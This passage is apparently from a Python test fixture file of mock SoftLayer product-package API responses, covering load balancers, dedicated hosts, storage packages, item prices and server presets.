'proratedOrderTotal': '0', 'serverCoreCount': '', 'privateCloudOrderFlag': False, 'totalSetupTax': '0', 'quantity': 1 } itemsLoadbal = [ { "capacity": "0", "description": "Load Balancer as a Service", "id": 10043, "keyName": "LOAD_BALANCER_AS_A_SERVICE", "itemCategory": { "categoryCode": "load_balancer_as_a_service", 
"id": 1116, "name": "Load Balancer As A Service", }, "prices": [ { "hourlyRecurringFee": "0", "id": 199447, "locationGroupId": '', "recurringFee": "0", } ] }, { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", "itemCategory": { "categoryCode": "load_balancer_uptime", "id": 1119, "name": "Load Balancer Uptime", }, "prices": [ { "hourlyRecurringFee": ".028", "id": 205913, "locationGroupId": 507, }]} ] regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01', "groups": [ { "description": "Location Group 4", "id": 507, "locationGroupTypeId": 82, "name": "Location Group 4", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Cross Region - EU", "id": 1303, "locationGroupTypeId": 82, "name": "eu", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Regional Frankfurt", "id": 1783, "locationGroupTypeId": 82, "name": "eu-de", "locationGroupType": { "name": "PRICING" } } ] }}, 'sortOrder': 10}] getAllObjectsLoadbal = [ { "id": 805, "keyName": "LBAAS", "name": "Load Balancer As A Service (LBaaS)", "items": itemsLoadbal, "regions": regionsLoadbal } ] getAllObjectsDH = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores X 242 RAM X 1.2 TB", "bundleItems": [ { "capacity": "1200", "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "242_GB_RAM", "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, 
"setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_242_RAM_X_1_4_TB", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getAllObjectsDHGpu = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": 
"0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getRegions = [{ "description": "WDC07 - Washington, DC", "keyname": "WASHINGTON07", "location": { "locationId": 2017603, "location": { "id": 2017603, "longName": "Washington 7", "name": "wdc07", "priceGroups": [ { "description": "COS Regional - US East", "id": 1305, "locationGroupTypeId": 82, "name": "us-east", "locationGroupType": { "name": "PRICING" } } ] } }, "locations": [{ "location": { "euCompliantFlag": False, "id": 2017603, "longName": "Washington 7", "name": "wdc07", "statusId": 2}, "locationPackageDetails": [{ "isAvailable": 1, "locationId": 2017603, "packageId": 46 }] }] }] getItemPrices = [ { "hourlyRecurringFee": ".093", "id": 204015, "recurringFee": "62", "categories": [ { "categoryCode": "guest_core" } ], "item": { "description": "4 x 2.0 GHz or higher Cores", "id": 859, "keyName": "GUEST_CORES_4", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2, "regions": [ { "description": "MON01 - Montreal", "keyname": "MONTREAL", "sortOrder": 94 } ] }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", 
"statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2, "regions": [ { "description": "AMS02 POP - Amsterdam", "keyname": "AMSTERDAM02", "sortOrder": 12 } ] }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".006", "id": 204663, "recurringFee": "4.1", "item": { "description": "100 GB (LOCAL)", "id": 3899, "keyName": "GUEST_DISK_100_GB_LOCAL_3", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".217", "id": 204255, "recurringFee": "144", "item": { "description": "16 GB ", "id": 1017, "keyName": "RAM_16_GB", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } } ] 
getActivePresets = [ { "description": "M1.64x512x25", "id": 799, "isActive": "1", "keyName": "M1_64X512X25", "name": "M1.64x512x25", "packageId": 835 }, { "description": "M1.56x448x100", "id": 797, "isActive": "1", "keyName": "M1_56X448X100", "name": "M1.56x448x100", "packageId": 835 }, { "description": "M1.64x512x100", "id": 801, "isActive": "1", "keyName": "M1_64X512X100", "name": "M1.64x512x100", "packageId": 835 } ] getAccountRestrictedActivePresets = [] RESERVED_CAPACITY = [{"id": 1059}] getItems_RESERVED_CAPACITY = [ { 'id': 12273, 'keyName': 'B1_1X2_1_YEAR_TERM', 'description': 'B1 1x2 1 year term', 'capacity': 12, 'itemCategory': { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '.032', 'id': 217561, 'itemId': 12273, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' } ] } ] } ] getItems_1_IPV6_ADDRESS = [ { 'id': 4097, 'keyName': '1_IPV6_ADDRESS', 'itemCategory': { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, 'itemId': 4097, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 } ] } ] } ] getObject = { 'id': 200, 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 
'sortOrder': 10}], 'accountRestrictedActivePresets': [], 'activePresets': [ { 'description': 'AC2.8x60x25', 'id': 861, 'isActive': '1', 'keyName': 'AC2_8X60X25', 'name': 'AC2.8x60x25', 'packageId': 835 }, { 'description': 'AC2.8x60x100', 'id': 863, 'isActive': '1', 'keyName': 'AC2_8X60X100', 'name': 'AC2.8x60x100', 'packageId': 835 }], "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }, { "capacity": "2", "description": "2 x 2.0 GHz or higher Cores", "keyName": "GUEST_CORES_2", "attributes": [ { "id": 8261, "attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES" } ], "itemCategory": { "categoryCode": "guest_core", "id": 80 }}] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }]}
33.444606
106
0.375074
HARDWARE_ITEMS = [ {'attributes': [], 'capacity': '999', 'description': 'Unknown', 'itemCategory': {'categoryCode': 'unknown', 'id': 325}, 'keyName': 'UNKNOWN', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1245172, "locationGroupId": '', 'itemId': 935954, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '64', 'description': '1 IPv6 Address', 'itemCategory': {'categoryCode': 'pri_ipv6_addresses', 'id': 325}, 'keyName': '1_IPV6_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, "locationGroupId": '', 'itemId': 4097, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}}, {'attributes': [], 'capacity': '1', 'description': '1 IP Address', 'itemCategory': 
{'categoryCode': 'pri_ip_addresses', 'id': 13}, 'keyName': '1_IP_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 21, "locationGroupId": '', 'itemId': 15, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS', 'id': 1014}], 'description': 'Unlimited SSL VPN Users', 'itemCategory': {'categoryCode': 'vpn_management', 'id': 31}, 'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 420, "locationGroupId": '', 'itemId': 309, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'description': 'Reboot / KVM over IP', 'itemCategory': {'categoryCode': 'remote_management', 'id': 46}, 'keyName': 'REBOOT_KVM_OVER_IP', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 906, "locationGroupId": '', 'itemId': 504, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'id': 22505, "locationGroupId": '', 'itemId': 4481, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 98}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 
'quantity': '', 'setupFee': '0', 'sort': 99}]}] ENTERPRISE_PACKAGE = { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 240, 'name': 'Endurance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_service_enterprise'}, 'keyName': 'CODENAME_PRIME_STORAGE_SERVICE', 'prices': [ { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 45058, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_file'}, 'keyName': 'FILE_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 45108, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_block'}, 'keyName': 'BLOCK_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 45098, 'locationGroupId': '' } ] }, { 'capacity': '10', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '10_GB_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46160, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46170, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 45860, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 
46659, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45128, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46789, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45318, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '300'} ], 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'WRITEHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45088, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '200'} ], 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'READHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45078, 'locationGroupId': '' } ] } ] } PERFORMANCE_PACKAGE = { 'categories': [ {'categoryCode': 'performance_storage_iscsi'}, {'categoryCode': 'performance_storage_nfs'} ], 'id': 222, 'name': 'Performance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_iscsi'}, 'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_iscsi'} ], 'id': 40672, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_nfs'}, 'keyName': 'FILE_STORAGE_PERFORMANCE_NFS', 'prices': [ { 'categories': [ {'categoryCode': 
'performance_storage_nfs'} ], 'id': 40662, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40682, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40742, 'locationGroupId': '' } ] }, { 'capacity': '800', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '800_IOPS_4', 'prices': [ { 'capacityRestrictionMaximum': '1000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 41562, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '1000_IOPS', 'prices': [ { 'capacityRestrictionMaximum': '20', 'capacityRestrictionMinimum': '20', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 40882, 'locationGroupId': '' } ] } ] } SAAS_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 189443, 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '999', 'capacityMinimum': '500', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': 
'500_999_GBS', 'prices': [ { 'id': 189993, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB', 'prices': [ { 'id': 193433, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB', 'prices': [ { 'id': 194763, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '10000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '999', 'capacityRestrictionMinimum': '500', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190053, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': '' } ] }, { 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 193373, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 
194703, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '10', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 191193, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193613, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 194943, 'locationGroupId': ''}] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '1', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 192033, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 194693, 'locationGroupId': '' } ] } ] } SAAS_REST_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 
'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': None } ] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': None } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': None } ] } ] } activePreset1 = { 'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID', 'id': 64, 'isActive': '1', 'keyName': 'S1270_8GB_2X1TBSATA_NORAID', 'name': 'S1270 8GB 2X1TBSATA NORAID', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } activePreset2 = { 'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10', 'id': 65, 'isActive': '1', 'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10', 'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } getAllObjects = [{ 'activePresets': [activePreset1], 
